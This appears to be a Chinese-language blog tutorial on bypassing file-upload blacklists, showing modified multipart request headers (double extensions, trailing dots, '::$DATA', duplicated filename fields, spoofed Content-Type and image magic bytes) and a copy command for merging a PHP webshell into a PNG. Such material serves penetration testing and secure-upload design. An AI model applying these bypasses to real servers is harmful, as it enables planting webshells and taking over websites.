文件上传之黑名单绕过常规手法

1. 前端JS限制 绕过

绕过方式：

上传一个正常文件，在burp抓包后直接更改后缀名。例如：1.jpg 更改为 1.jpg.php
修改前：
Content-Disposition: form-data; name="FILE"; filename="file9689.png"
修改后：
Content-Disposition: form-data; name="FILE"; filename="file9689.png.php"

利用方式：

同时更改原正常文件的数据内容，在下图所示的请求包位置增加POC即可。

2. “点” 或 “反斜杠+点” 绕过

绕过方式：

上传一个正常文件，在burp抓包后直接更改后缀名。
修改前：
Content-Disposition: form-data; name="FILE"; filename="file9689.png"
修改后：
Content-Disposition: form-data; name="FILE"; filename="file9689.png.php."
修改后：
Content-Disposition: form-data; name="FILE"; filename="file9689.png.php\."

利用方式：

同“1. 前端JS限制 绕过”。

3. 特殊后缀绕过

此绕过方式参考文章：https://blog.csdn.net/2302_79800344/article/details/136137514

绕过方式：

上传一个正常文件，在burp抓包后直接更改后缀名。
修改前：
Content-Disposition: form-data; name="FILE"; filename="file9689.png"
修改后：
Content-Disposition: form-data; name="FILE"; filename="file9689.png.php::$DATA"

利用方式：

同“1. 前端JS限制 绕过”。

4. 头文件检测 绕过

JPEG(jpg),文件头：FFD8FF
PNG(png),文件头：89504E47
GIF(gif),文件头：47494638
TIFF(tif),文件头：49492A00
Windows Bitmap(bmp)，文件头：424D

简单绕过方法：

使用一张正常的图片，修改内容为poc，但同时保留图片的前30行代码即可。
例如：

利用方式：

同“1. 前端JS限制 绕过”。

5. mime检测 绕过

此绕过方法参考文章：https://blog.csdn.net/m0_64378913/article/details/124915447

绕过方法：

修改前：Content-Type: text/html
修改后：Content-Type: image/jpeg

利用方式：

同“1. 前端JS限制 绕过”。

MIME类型(通用型)表单：

6. 检验图片机制 绕过

此绕过方法参考文章：https://blog.csdn.net/m0_64378913/article/details/124915447

场景复现：

直接修改请求包中的内容，可能导致预设的原图片无法正常显示。如果后台校验图片是否正常显示，就需要进行包装为“图片马”。

图片马的利用条件及使用方法：

详情请参考链接：https://blog.csdn.net/2301_80661529/article/details/136464023

注：图片马单独存在无危害，一般在进行“文件上传的条件竞争”时使用。

图片马的制作方法：

准备一个php一句话木马文件，比如此处文件名为phpinfo.php，内容为。
合并文件。在windows系统下，运行cmd，先cd到图片与文件所在文件夹下再执行命令，输入命令copy upfile.png/b+phpinfo.php/a muma.png。需要注意的是需要先cd到两个文件所在的路径下执行命令。
以记事本方式打开生成的文件，可以看到里面包含着php代码语句。

7. 双写赋值 绕过

绕过方法：

修改前：
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg
修改后：
Content-Disposition: form-data; name="file"; filename="1.jpg"; filename="1.jpg.jsp"
Content-Type: image/jpeg

利用方式：

同“1. 前端JS限制 绕过”。

未完待续…………